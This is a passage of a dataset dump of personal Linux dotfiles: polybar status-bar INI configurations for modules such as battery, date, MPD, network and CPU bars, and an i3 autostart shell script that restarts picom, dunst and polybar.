<label-muted>\n\nlabel-muted = 婢 \"Muted\"\nlabel-muted-padding = 2\nlabel-muted-foreground = ${color.ac}\nlabel-muted-background = #fff85a\nlabel-volume-underline = #fffb8f\nlabel-volume-overline = #fffb8f\n\n# Only applies if <ramp-volume> is used.\nramp-volume-0 = 奄\nramp-volume-1 = 奔\nramp-volume-2 = 墳\n\n###########################\n# #\n# -*- BATTERY -*- #\n# #\n###########################\n\n[module/battery]\ntype = internal/battery\n\n# This is useful in case the battery never reports 100% charge.\nfull-at = 100\n\n# ls -1 /sys/class/power_supply/.\nbattery = BAT0\nadapter = AC\n\n# Needed as a fallback for systems that don't report events on sysfs/procfs.\npoll-interval = 2\n\n# Available tags:\n# 1. <label-charging> (default).\n# 2. <bar-capacity>.\n# 3. <ramp-capacity>.\n# 4. <animation-charging>.\nformat-charging = <animation-charging> <label-charging>\nformat-charging-padding = 2\nformat-charging-foreground = ${color.ac}\nformat-charging-background = #fff85a\nformat-charging-underline = #fffb8f\nformat-charging-overline = #fffb8f\n\n# Available tokens:\n# 1. %percentage% (default).\n# 2. %time%.\n# 3. %consumption% (shows current charge rate in watts).\nlabel-charging = %percentage%%\n\n# Available tags:\n# 1. <label-discharging> (default).\n# 2. <bar-capacity>.\n# 3. <ramp-capacity>.\n# 4. <animation-discharging>.\nformat-discharging = <ramp-capacity> <label-discharging>\nformat-discharging-padding = 2\nformat-discharging-foreground = ${color.ac}\nformat-discharging-background = #fff85a\nformat-discharging-underline = #fffb8f\nformat-discharging-overline = #fffb8f\n\n# Available tokens:\n# 1. %percentage% (default).\n# 2. %time%.\n# 3. %consumption% (shows current charge rate in watts).\nlabel-discharging = %percentage%%\n\n# Available tokens:\n# 1. 
%percentage% (default).\nlabel-full = Fully Charged\nlabel-full-padding = 2\nlabel-full-foreground = ${color.ac}\nlabel-full-background = #fff85a\nlabel-full-underline = #fffb8f\nlabel-full-overline = #fffb8f\n\n# Only applies if <ramp-capacity> is used.\nramp-capacity-0 = \nramp-capacity-1 = \nramp-capacity-2 = \nramp-capacity-3 = \nramp-capacity-4 = \nramp-capacity-5 = \nramp-capacity-6 = \nramp-capacity-7 = \nramp-capacity-8 = \nramp-capacity-9 = \nramp-capacity-10 = \n\n# Only applies if <bar-capacity> is used.\n#bar-capacity-width = 10\n\n# Only applies if <animation-charging> is used.\nanimation-charging-0 = \nanimation-charging-1 = \nanimation-charging-2 = \nanimation-charging-3 = \nanimation-charging-4 = \nanimation-charging-5 = \nanimation-charging-6 = \n\n# Framerate in milliseconds.\nanimation-charging-framerate = 750\n\n########################\n# #\n# -*- DATE -*- #\n# #\n########################\n\n[module/date]\ntype = internal/date\n\nformat-padding = 2\nformat-background = #fff85a\nformat-foreground = #000\nformat-underline = #fffb8f\nformat-overline = #fffb8f\n\n# Seconds to sleep between updates.\ninterval = 1.0\n\n# Time format.\ntime = %I:%M %p\ntime-alt = %Y-%m-%d%\n\nformat = <label>\n\n# Available tokens:\n# 1. %date%.\n# 2. %time%.\nlabel = %time%\n\n##############################\n# #\n# -*- FILESYSTEM -*- #\n# #\n##############################\n\n[module/filesystem]\ntype = internal/fs\n\n# Mountpoints to display.\nmount-0 = /\n#mount-1 = /home\n#mount-2 = /var\n\n# Seconds to sleep between updates.\ninterval = 10\n\n# Display fixed precision values.\nfixed-values = true\n\n# Spacing between entries.\n#spacing = 4\n\n# Available tags:\n# 1. <label-mounted> (default).\n# 2. <bar-free>.\n# 3. <bar-used>.\n# 4. <ramp-capacity>.\nformat-mounted = <label-mounted>\nformat-mounted-prefix = \n\n# Available tags:\n# 1. <label-unmounted> (default).\nformat-unmounted = <label-unmounted>\nformat-unmounted-prefix = \n\n# Available tokens:\n# 1. %mountpoint%.\n# 2. %type%.\n# 3. %fsname%.\n# 4. %percentage_free%.\n# 5. %percentage_used%.\n# 6. %total%.\n# 7. %free%.\n# 8. %used%.\nlabel-mounted = \" %free%\"\n\n# Available tokens:\n# 1. %mountpoint%\nlabel-unmounted = %mountpoint%: not mounted\n\n##########################\n# #\n# -*- GITHUB -*- #\n# #\n##########################\n\n#[module/github]\n#type = internal/github\n\n# Accessing an access token stored in file.\n#token = ${file:/path/to/file/containing/github/access.token}\n\n# Accessing an access token stored in an environment variable.\n#token = ${env:GITHUB_ACCESS_TOKEN}\n\n# Whether empty notifications should be displayed or not.\n#empty-notifications = false\n\n# Number of seconds in between requests.\n#interval = 10\n\n# Available tags:\n# 1. <label> (default).\n#format = <label>\n\n# Available tokens:\n# 1. 
%notifications% (default).\n#label = %notifications%\n\n######################\n# #\n# -*- i3 -*- #\n# #\n######################\n\n[module/i3]\ntype = internal/i3\n\n#############\n# SEPARATOR #\n#############\n\npin-workspaces = false\n\n# Separator in between workspaces.\nlabel-separator = \n\n############\n# HANDLERS #\n############\n\n# Create click handler used to focus workspace.\nenable-click = true\n\n# Create scroll handlers used to cycle workspaces.\nenable-scroll = false\n\n###################\n# WORKSPACE ICONS #\n###################\n\n# ws-icon-[0-9]+ = <label>;<icon>.\nws-icon-0 = 1;\nws-icon-1 = 2;\nws-icon-2 = 3;\nws-icon-3 = 4;♝\nws-icon-4 = 5;♞\nws-icon-5 = 6;♞\nws-icon-6 = 7;♞\nws-icon-7 = 8;♞\nws-icon-8 = 9;♞\nws-icon-default = ♟\n\n##########\n# FORMAT #\n##########\n\n# Available tags:\n# 1. <label-state> (default) - gets replaced with <label-(focused|unfocused|visible|urgent)>\n# 2. <label-mode> (default)\nformat = <label-state> <label-mode>\n\nlabel-mode = %mode%\nlabel-mode-background = #e60053\n\n###########\n# FOCUSED #\n###########\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-focused = %icon%\nlabel-focused-padding-left = 0\nlabel-focused-padding-right = 1\nlabel-focused-margin = 1\nlabel-focused-font = 2\nlabel-focused-foreground = #fff\nlabel-focused-background = #2fbbf2\nlabel-focused-overline = #148ebe\nlabel-focused-underline = #148ebe\n\n#############\n# UNFOCUSED #\n#############\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-unfocused = \" %icon% \"\nlabel-unfocused-padding-left = 1\nlabel-unfocused-padding-right = 1\nlabel-unfocused-margin = 1\nlabel-unfocused-font = 2\nlabel-unfocused-background = #eeeeee\nlabel-unfocused-foreground = #dd222222\nlabel-unfocused-overline = #c5c5c5\nlabel-unfocused-underline = #c5c5c5\n\n###########\n# VISIBLE #\n###########\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-visible = \" %icon% \"\nlabel-visible-padding-left = 1\nlabel-visible-padding-right = 1\nlabel-visible-margin = 1\nlabel-visible-font = 2\n\n##########\n# URGENT #\n##########\n\n# Available tokens:\n# 1. %name%\n# 2. %icon%\n# 3. %index%\n# 4. %output%\nlabel-urgent = \" %icon% \"\nlabel-urgent-padding-left = 1\nlabel-urgent-padding-right = 1\nlabel-urgent-margin = 1\nlabel-urgent-font = 2\n\n##########################\n# #\n# -*- MEMORY -*- #\n# #\n##########################\n\n[module/memory]\ntype = internal/memory\n\n# Seconds to sleep between updates\ninterval = 3\n\n# Available tags:\n# 1. <label> (default).\n# 2. <bar-used>.\n# 3. <bar-free>.\n# 4. <ramp-used>.\n# 5. <ramp-free>.\n# 6. <bar-swap-used>.\n# 7. <bar-swap-free>.\n# 8. <ramp-swap-used>.\n# 9. 
<ramp-swap-free>.\nformat = <label>\nformat-prefix = \n\n# Available tokens:\n# %percentage_used% (default).\n# %percentage_free%.\n# %gb_used%.\n# %gb_free%.\n# %gb_total%.\n# %mb_used%.\n# %mb_free%.\n# %mb_total%.\n# %percentage_swap_used%.\n# %percentage_swap_free%.\n# %mb_swap_total%.\n# %mb_swap_free%.\n# %mb_swap_used%.\n# %gb_swap_total%.\n# %gb_swap_free%.\n# %gb_swap_used%.\nlabel = \" %mb_used%\"\n\n# Only applies if <bar-used> is used.\n#bar-used-indicator =\n#bar-used-width = 50\n#bar-used-foreground-0 = #55aa55\n#bar-used-foreground-1 = #557755\n#bar-used-foreground-2 = #f5a70a\n#bar-used-foreground-3 = #ff5555\n#bar-used-fill = ▐\n#bar-used-empty = ▐\n#bar-used-empty-foreground = #444444\n\n# Only applies if <ramp-used> is used.\n#ramp-used-0 = \n#ramp-used-1 = \n#ramp-used-2 = \n#ramp-used-3 = \n#ramp-used-4 = \n\n# Only applies if <ramp-free> is used.\n#ramp-free-0 = \n#ramp-free-1 = \n#ramp-free-2 = \n#ramp-free-3 = \n#ramp-free-4 = \n\n#######################\n# #\n# -*- MPD -*- #\n# #\n#######################\n\n[module/mpd]\ntype = internal/mpd\n\n# Host where mpd is running (either ip or domain name).\n# Can also be the full path to a unix socket where mpd is running.\n#host = 127.0.0.1\n#port = 6600\n#password = mysecretpassword\n\n# Seconds to sleep between progressbar/song timer sync.\ninterval = 2\n\n# Available tags:\n# 1. <label-song> (default).\n# 2. <label-time>.\n# 3. <bar-progress>.\n# 4. <toggle> - gets replaced with <icon-(pause|play)>.\n# 5. <toggle-stop> - gets replaced with <icon-(stop|play)>.\n# 6. <icon-random>.\n# 7. <icon-repeat>.\n# 8. <icon-repeatone> (deprecated).\n# 9. <icon-single> - Toggle playing only a single song. Replaces <icon-repeatone>.\n# 10. <icon-consume>.\n# 11. <icon-prev>.\n# 12. <icon-stop>.\n# 13. <icon-play>.\n# 14. <icon-pause>.\n# 15. <icon-next>.\n# 16. <icon-seekb>.\n# 17. <icon-seekf>.\nformat-online = <label-song> <icon-prev> <toggle> <icon-next>\n\n#format-playing = ${self.format-online}\n#format-paused = ${self.format-online}\n#format-stopped = ${self.format-online}\n\n# Available tags:\n# 1. <label-offline>.\n#format-offline = <label-offline>\n\n# Available tokens:\n# 1. %artist%.\n# 2. %album-artist%.\n# 3. %album%.\n# 4. %date%.\n# 5. 
%title%.\nlabel-song = \"%artist% - %title%\"\nlabel-song-maxlen = 25\nlabel-song-ellipsis = true\n\nlabel-offline = \"MPD is offline\"\n\n# Only applies if <icon-X> is used.\nicon-play = \nicon-pause = \nicon-stop = \nicon-prev = \nicon-next = \nicon-seekb = ⏪\nicon-seekf = ⏩\nicon-random = 🔀\nicon-repeat = 🔁\nicon-repeatone = 🔂\nicon-single = 🔂\nicon-consume = ✀\n\n# Used to display the state of random/repeat/repeatone/single.\n# Only applies if <icon-[random|repeat|repeatone|single]> is used.\n#toggle-on-foreground = #ff\n#toggle-off-foreground = #55\n\n# Only applies if <bar-progress> is used.\n#bar-progress-width = 45\n#bar-progress-indicator = |\n#bar-progress-fill = ─\n#bar-progress-empty = ─\n\n#################################\n# #\n# -*- WIRED NETWORK -*- #\n# #\n#################################\n\n[module/wired-network]\ntype = internal/network\ninterface = eth0\n\n[module/wireless-network]\ntype = internal/network\ninterface = wlp3s0\n\n# Normal Module\n[module/network]\ntype = internal/network\ninterface = wlp3s0\n\n# Seconds to sleep between updates.\ninterval = 1.0\n\n# Accumulate values from all interfaces when querying for up/downspeed rate.\naccumulate-stats = true\n\n# Consider an `UNKNOWN` interface state as up.\n# Some devices have an unknown state, even when they're running.\nunknown-as-up = true\n\n# Available tags:\n# 1. <label-connected> (default).\n# 2. <ramp-signal>.\nformat-connected = <ramp-signal> <label-connected>\n\n# Available tags:\n# 1. <label-disconnected> (default).\nformat-disconnected = <label-disconnected>\n\n# Available tags:\n# 1. <label-connected> (default).\n# 2. <label-packetloss>.\n# 3. <animation-packetloss>.\n#format-packetloss = <animation-packetloss> <label-connected>\n\n# Available tokens:\n# 1. %ifname% [wireless+wired].\n# 2. %local_ip% [wireless+wired].\n# 3. %local_ip6% [wireless+wired].\n# 4. %essid% [wireless].\n# 5. %signal% [wireless].\n# 6. %upspeed% [wireless+wired].\n# 7. %downspeed% [wireless+wired].\n# 8. %linkspeed% [wired].\nlabel-connected = \"%essid% %downspeed:8% %upspeed:8%\"\n#label-connected-foreground = #eefafafa\n\n# Available tokens:\n# 1. %ifname% [wireless+wired].\nlabel-disconnected = \"Not Connected\"\n#label-disconnected-foreground = #66ffffff\n\n# Available tokens:\n# 1. %ifname% [wireless+wired].\n# 2. %local_ip% [wireless+wired].\n# 3. %local_ip6% [wireless+wired].\n# 4. %essid% [wireless].\n# 5. %signal% [wireless].\n# 6. %upspeed% [wireless+wired].\n# 7. %downspeed% [wireless+wired].\n# 8. %linkspeed% [wired].\n#label-packetloss = %essid%\n#label-packetloss-foreground = #eefafafa\n\n# Only applies if <ramp-signal> is used.\nramp-signal-0 = \nramp-signal-1 = \nramp-signal-2 = \nramp-signal-3 = \nramp-signal-4 = \n\n# Only applies if <animation-packetloss> is used.\n#animation-packetloss-0 = ⚠\n#animation-packetloss-0-foreground = #ffa64c\n#animation-packetloss-1 = ⚠\n#animation-packetloss-1-foreground = #000000\n\n# Framerate in milliseconds.\n#animation-packetloss-framerate = 500\n\n###############################\n# #\n# -*- TEMPERATURE -*- #\n# #\n###############################\n\n[module/temperature]\ntype = internal/temperature\n\n# Seconds to sleep between updates.\ninterval = 0.5\n\n# Thermal zone to use.\nthermal-zone = 0\n\n# Threshold temperature to display warning label (in degrees celsius).\nwarn-temperature = 60\n\n# Whether or not to show units next to the temperature tokens (°C, °F).\nunits = true\n\n# Available tags:\n# 1. <label> (default).\n# 2. 
<ramp>.\nformat = <ramp> <label>\n\n# Available tags:\n# 1. <label-warn> (default).\n# 2. <ramp>.\nformat-warn = <ramp> <label-warn>\n\n# Available tokens:\n# %temperature% (deprecated)\n# %temperature-c% (default, temperature in °C)\n# %temperature-f% (temperature in °F)\nlabel = %temperature-c%\n\n# Available tokens:\n# 1. %temperature% (deprecated).\n# 2. %temperature-c% (default, temperature in °C).\n# 3. %temperature-f% (temperature in °F).\nlabel-warn = \"%temperature-c%\"\nlabel-warn-foreground = #f00\n\n# Icons.\nramp-0 = A\nramp-1 = B\n\n############################\n# #\n# -*- KEYBOARD -*- #\n# #\n############################\n\n[module/keyboard]\ntype = internal/xkeyboard\n\n# List of indicators to ignore.\nblacklist-0 = num lock\nblacklist-1 = scroll lock\n\n# Available tags:\n# 1. <label-layout> (default).\n# 2. <label-indicator> (default).\nformat = <label-layout> <label-indicator>\n#format-spacing = 0\n\n# Available tokens:\n# 1. %layout%.\n# 2. %name%.\n# 3. %number%.\nlabel-layout = %layout%\n#label-layout-padding = 2\n#label-layout-background = #bc99ed\n#label-layout-foreground = #000\n\n# Available tokens:\n# 1. %name%.\nlabel-indicator = %name%\n#label-indicator-padding = 2\nlabel-indicator-foreground = ${color.ac}\n\n#########################\n# #\n# -*- TITLE -*- #\n# #\n#########################\n\n[module/title]\ntype = internal/xwindow\n\n# Available tags:\n# 1. <label> (default).\nformat = <label>\n#format-background = ${color.bg}\n#format-foreground = ${color.ac}\n#format-padding = 4\n\n# Available tokens:\n# 1. %title%.\nlabel = %title%\nlabel-maxlen = 30\n\n#label-empty = Arch Linux\n#label-empty-foreground = #707880"
},
{
"alpha_fraction": 0.5761815905570984,
"alphanum_fraction": 0.5991915464401245,
"avg_line_length": 21.731449127197266,
"blob_id": "81ce8f9c367817d09ab16966189f3946d5490dff",
"content_id": "1a647275bd54325e412a83c361fc9c78d5233d31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 6494,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 283,
"path": "/my-polybar/bars.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# ______ \n# | ___ \\ \n# | |_/ / __ _ _ __ ___ \n# | ___ \\/ _` | '__/ __|\n# | |_/ / (_| | | \\__ \\\n# \\____/ \\__,_|_| |___/\n\n\n###########################\n# #\n# -*- CPU BAR -*- #\n# #\n###########################\n\n[module/cpu_bar]\ntype = internal/cpu\ninterval = 0.5\n\nformat = <label> <ramp-coreload>\nformat-background = #66cc99\nformat-foreground = #2a5c45\nformat-underline = #60eaa5\nformat-overline = #60eaa5\nformat-padding = 2\n\nlabel = cpu\nlabel-font = 1\n\nramp-coreload-0 = ▁\nramp-coreload-0-font = 4\nramp-coreload-0-foreground = #aaff77\nramp-coreload-1 = ▂\nramp-coreload-1-font = 4\nramp-coreload-1-foreground = #aaff77\nramp-coreload-2 = ▃\nramp-coreload-2-font = 4\nramp-coreload-2-foreground = #aaff77\nramp-coreload-3 = ▄\nramp-coreload-3-font = 4\nramp-coreload-3-foreground = #aaff77\nramp-coreload-4 = ▅\nramp-coreload-4-font = 4\nramp-coreload-4-foreground = #fba922\nramp-coreload-5 = ▆\nramp-coreload-5-font = 4\nramp-coreload-5-foreground = #fba922\nramp-coreload-6 = ▇\nramp-coreload-6-font = 4\nramp-coreload-6-foreground = #ff5555\nramp-coreload-7 = █\nramp-coreload-7-font = 4\nramp-coreload-7-foreground = #ff5555\n\n##################################\n# #\n# -*- FILESYSTEM BAR -*- #\n# #\n##################################\n\n[module/filesystem_bar]\ntype = internal/fs\n\n# Mountpoints to display\nmount-0 = /\n##mount-1 = /home\n##mount-2 = /var\n\n# Seconds to sleep between updates\n# Default: 30\ninterval = 10\n\n# Display fixed precision values\n# Default: false\nfixed-values = false\n\n# Spacing between entries\n# Default: 2\n##spacing = 4\n\n# Available tags:\n# <label-mounted> (default)\n# <bar-free>\n# <bar-used>\n# <ramp-capacity>\nformat-mounted = <bar-used> <label-mounted>\nformat-mounted-prefix = \" \"\n\n# Available tags:\n# <label-unmounted> (default)\n##format-unmounted = <label-unmounted>\n##format-unmounted-prefix = \n\n# Available tokens:\n# %mountpoint%\n# %type%\n# %fsname%\n# %percentage_free%\n# %percentage_used%\n# %total%\n# %free%\n# %used%\n# Default: %mountpoint% %percentage_free%%\nlabel-mounted = %used%/%total%\n\n# Available tokens:\n# %mountpoint%\n# Default: %mountpoint% is not mounted\n##label-unmounted = %mountpoint%: not mounted\n\n# Only applies if <bar-used> is used\nbar-used-width = 10\nbar-used-gradient = false\n\nbar-used-indicator = \nbar-used-indicator-foreground = ${color.bi}\nbar-used-indicator-font = 2\n\nbar-used-fill = ━\nbar-used-foreground-0 = ${color.bn}\nbar-used-foreground-1 = ${color.bn}\nbar-used-foreground-2 = ${color.bn}\nbar-used-foreground-3 = ${color.bn}\nbar-used-foreground-4 = ${color.bn}\nbar-used-foreground-5 = ${color.bm}\nbar-used-foreground-6 = ${color.bm}\nbar-used-foreground-7 = ${color.bd}\nbar-used-foreground-8 = ${color.bd}\nbar-used-fill-font = 2\n\nbar-used-empty = ┉\nbar-used-empty-foreground = ${color.be}\nbar-used-empty-font = 2\n\n##############################\n# #\n# -*- MEMORY BAR -*- #\n# #\n##############################\n\n[module/memory_bar]\ntype = internal/memory\n\n#format = <label> <bar-used>\nformat = <label>\nformat-padding = 2\nformat-background = #cb66cc\nformat-foreground = #ffe3ff\nformat-underline = #e58de6\nformat-overline = #e58de6\n\nlabel = RAM %mb_used% / %mb_total%\nlabel-font = 1\n\nbar-used-width = 15\nbar-used-indicator = |\nbar-used-indicator-font = 4\nbar-used-indicator-foreground = #ffaaf5\nbar-used-fill = 
─\nbar-used-fill-font = 4\nbar-used-fill-foreground = #ffaaf5\nbar-used-empty = ─\nbar-used-empty-font = 4\nbar-used-empty-foreground = #934e94\n\n###########################\n# #\n# -*- MPD BAR -*- #\n# #\n###########################\n\n[module/mpd_bar]\ntype = internal/mpd\n\n# Host where mpd is running (either ip or domain name)\n# Can also be the full path to a unix socket where mpd is running.\n##host = 127.0.0.1\n##port = 6600\n##password = mysecretpassword\n\n# Seconds to sleep between progressbar/song timer sync\n# Default: 1\ninterval = 1\n\n# Available tags:\n# <label-song> (default)\n# <label-time>\n# <bar-progress>\n# <toggle> - gets replaced with <icon-(pause|play)>\n# <toggle-stop> - gets replaced with <icon-(stop|play)>\n# <icon-random>\n# <icon-repeat>\n# <icon-repeatone> (deprecated)\n# <icon-single> - Toggle playing only a single song. Replaces <icon-repeatone>\n# <icon-consume>\n# <icon-prev>\n# <icon-stop>\n# <icon-play>\n# <icon-pause>\n# <icon-next>\n# <icon-seekb>\n# <icon-seekf>\nformat-online = <label-song> <bar-progress> <label-time> \n\n#format-playing = ${self.format-online}\n#format-paused = ${self.format-online}\n#format-stopped = ${self.format-online}\n\n# Available tags:\n# <label-offline>\n#format-offline = <label-offline>\n\n# Available tokens:\n# %artist%\n# %album-artist%\n# %album%\n# %date%\n# %title%\n# Default: %artist% - %title%\nlabel-song = \"%title%\"\nlabel-song-maxlen = 25\nlabel-song-ellipsis = true\n\n# Available tokens:\n# %elapsed%\n# %total%\n# Default: %elapsed% / %total%\n##abel-time = %elapsed% / %total%\n\n# Available tokens:\n# None\nlabel-offline = \"mpd is offline\"\n\n# Only applies if <icon-X> is used\nicon-play = \nicon-pause = \nicon-stop = \nicon-prev = \nicon-next = \nicon-seekb = ⏪\nicon-seekf = ⏩\nicon-random = 🔀\nicon-repeat = 🔁\nicon-repeatone = 🔂\nicon-single = 🔂\nicon-consume = ✀\n\n# Used to display the state of random/repeat/repeatone/single\n# Only applies if <icon-[random|repeat|repeatone|single]> is used\n##toggle-on-foreground = #ff\n##toggle-off-foreground = #55\n\n# Only applies if <bar-progress> is used\nbar-progress-width = 10\nbar-progress-gradient = true\n\nbar-progress-indicator = \nbar-progress-indicator-foreground = ${color.bi}\nbar-progress-indicator-font = 2\n\nbar-progress-fill = ━\nbar-progress-foreground-0 = ${color.bn}\nbar-progress-foreground-1 = ${color.bn}\nbar-progress-foreground-2 = ${color.bn}\nbar-progress-foreground-3 = ${color.bm}\nbar-progress-foreground-4 = ${color.bm}\nbar-progress-foreground-5 = ${color.bm}\nbar-progress-foreground-6 = ${color.bd}\nbar-progress-foreground-7 = ${color.bd}\nbar-progress-foreground-8 = ${color.bd}\nbar-progress-fill-font = 2\n\nbar-progress-empty = ┉\nbar-progress-empty-foreground = ${color.be}\nbar-progress-empty-font = 2"
},
{
"alpha_fraction": 0.38085541129112244,
"alphanum_fraction": 0.38543787598609924,
"avg_line_length": 26.29166603088379,
"blob_id": "a2481c040793c6e01129cd2a69ae7e71364623c6",
"content_id": "19f49788230a049423d055ecb0a03c4f0c27ce74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1964,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 72,
"path": "/i3/autostart.sh",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# ___ _ _ _ \n# / _ \\ | | | | | | \n# / /_\\ \\_ _| |_ ___ ___| |_ __ _ _ __| |_ \n# | _ | | | | __/ _ \\/ __| __/ _` | '__| __|\n# | | | | |_| | || (_) \\__ \\ || (_| | | | |_ \n# \\_| |_/\\__,_|\\__\\___/|___/\\__\\__,_|_| \\__| \n\n\n##############################\n# #\n# -*- WALLPAPERS -*- #\n# #\n##############################\n\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper1.jpg &\nfeh --bg-scale ~/.config/qtile/wallpapers/wallpaper2.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper3.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper4.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper5.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper6.jpg &\n\n###########################\n# #\n# -*- STARTUP -*- #\n# #\n###########################\n\n #########\n # PICOM #\n #########\n\n # If picom is running, kill it to prevent multiple instances.\n if ps -A | grep picom; then\n killall -q picom\n fi\n\n # Load picom\n exec picom --experimental-backends --config ~/.config/picom/picom.conf &\n \n #########\n # DUNST #\n #########\n\n # If dunst is running, kill it to prevent multiple instances.\n if ps -A | grep dunst; then\n killall -q dunst\n fi\n dunst -config ~/.config/dunst/dunstrc/dunstrc &\n\n ###########\n # POLYBAR #\n ###########\n\n # Terminate already running bar instances\n killall -q polybar\n\n # Wait until the processes have been shut down\n while pgrep -u $UID -x polybar >/dev/null; do sleep 1; done\n\n # Launch bar1 and bar2\n polybar -c ~/.config/polybar/my-polybar/config.ini main"
},
{
"alpha_fraction": 0.3288276493549347,
"alphanum_fraction": 0.3478034734725952,
"avg_line_length": 27.294116973876953,
"blob_id": "aba523abdf420306fdc6615edd3509a08bbdb2de",
"content_id": "7431cb342c0d5c3c0ea66b632f382e168e09325f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 3847,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 136,
"path": "/my-polybar/config.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# _ _ \n# | | | | \n# _ __ ___ | |_ _| |__ __ _ _ __ \n# | '_ \\ / _ \\| | | | | '_ \\ / _` | '__|\n# | |_) | (_) | | |_| | |_) | (_| | | \n# | .__/ \\___/|_|\\__, |_.__/ \\__,_|_| \n# | | __/ | \n# |_| |___/ \n\n\n# Dependencies#\n\n# 1. Network MODULE --> networkmanager-dmenu and dmenu.\n#\n#\n\n###################################\n# #\n# -*- INCLUDING FILES -*- #\n# #\n###################################\n\ninclude-file = ~/.config/polybar/my-polybar/colors.ini\ninclude-file = ~/.config/polybar/my-polybar/modules.ini\ninclude-file = ~/.config/polybar/my-polybar/user_modules.ini\ninclude-file = ~/.config/polybar/my-polybar/bars.ini\n\n################################\n# #\n# -*- BAR SETTINGS -*- #\n# #\n################################\n\n[bar/main]\n\n########################################\n# SETTINGS FOR THE BAR TO WORK WITH I3 #\n########################################\n\noverride-redirect = true\n\n####################\n# GENERAL SETTINGS #\n####################\n\nlocale = en_US.UTF-8\n\nfont-0 = \"Anonymice Nerd Font:size=10;2\"\nfont-1 = \"Anonymice Nerd Font:size=13;3\"\nfont-2 = \"icomoon\\-feather:size=10;2\"\nfont-3 = \"unifont:size=6;2\"\n\n########################\n# SIZE AND POSITIONING #\n########################\n\n# Put the bar at the bottom of the screen.\nbottom = false\n\nwidth = 98%\nheight = 24\n\noffset-x = 1%\noffset-y = 2%:-3\n\n##########\n# COLORS #\n##########\n\nbackground = ${color.bg}\nforeground = ${color.fg}\n\n###########\n# BORDERS #\n###########\n\n# Line selecting the active workspace.\n# 1. {overline,underline}-size.\n# 2. {overline,underline}-color.\noverline-size = 2\noverline-color = #bc92f8\nunderline-size = 2\nunderline-color = #bc92f8\n\n# Borders surrounding the bar.\n# 1. border-{left,top,right,bottom}-size\n# 2. border-{left,top,right,bottom}-color\nborder-left-size= 0\nborder-right-size= 0\nborder-color = ${color.ac}\n\npadding = 0\n\n# Number of spaces to add before/after each module.\nmodule-margin-left = 1\nmodule-margin-right = 1\n\n###########\n# MODULES #\n###########\n\n#########################################################################\n# -*- MODULES -*- | -*- USER-MODULES -*- | -*- BARS -*- #\n#-----------------------------------------------------------------------#\n# 1. alsa. | 1. checknetwork. | 1. cpu_bar. #\n# 2. battery. | 2. updates. | 2. memory_bar. #\n# 3. date. | 3. window_switch. | 3. filesystem_bar. #\n# 4. filesystem. | 4. launcher | 4. mpd_bar. #\n# 5. github. | 5. powermenu. | #\n# 6. i3. | 6. sysmenu. | #\n# 7. memory. | 7. menu. | #\n# 8. mpd. | | #\n# 9. wired-network. | | #\n# 10. network. | | #\n# 11. temperature. | | #\n# 12. keyboard. | | #\n# 13. title. | | #\n#########################################################################\n\nmodules-left = launcher i3\nmodules-center = \nmodules-right = updates cpu_bar memory_bar alsa battery checknetwork date sysmenu\n\nseparator =\n\n# This value is used to add extra spacing between elements.\nspacing = 0"
},
{
"alpha_fraction": 0.5373888611793518,
"alphanum_fraction": 0.550113320350647,
"avg_line_length": 24.0567684173584,
"blob_id": "73fad9e96607c38f3e00efde293cfa28602293c1",
"content_id": "0283906ad6cd15c40863c65cb97eb1ee942ca40d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 5757,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 229,
"path": "/my-polybar/user_modules.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# _ _ ___ ___ _ _ \n# | | | | | \\/ | | | | | \n# | | | |___ ___ _ __ | . . | ___ __| |_ _| | ___ ___ \n# | | | / __|/ _ \\ '__| | |\\/| |/ _ \\ / _` | | | | |/ _ \\/ __|\n# | |_| \\__ \\ __/ | | | | | (_) | (_| | |_| | | __/\\__ \\\n# \\___/|___/\\___|_| \\_| |_/\\___/ \\__,_|\\__,_|_|\\___||___/\n\n\n################################\n# #\n# -*- CHECKNETWORK -*- #\n# #\n################################\n\n[module/checknetwork]\ntype = custom/script\n\nexec = ~/.config/polybar/my-polybar/scripts/check-network\n\nformat-padding = 2\nformat-background = #fff85a\nformat-foreground = #000\nformat-underline = #fffb8f\nformat-overline = #fffb8f\n\n# Will the script output continous content?\ntail = true\n\n# Seconds to sleep between updates.\ninterval = 5\n\nclick-left = networkmanager_dmenu &\nclick-middle = networkmanager_dmenu &\nclick-right = networkmanager_dmenu 